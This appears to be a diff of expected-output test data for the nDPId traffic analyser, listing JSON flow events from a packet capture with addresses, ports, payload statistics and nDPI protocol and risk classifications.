-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 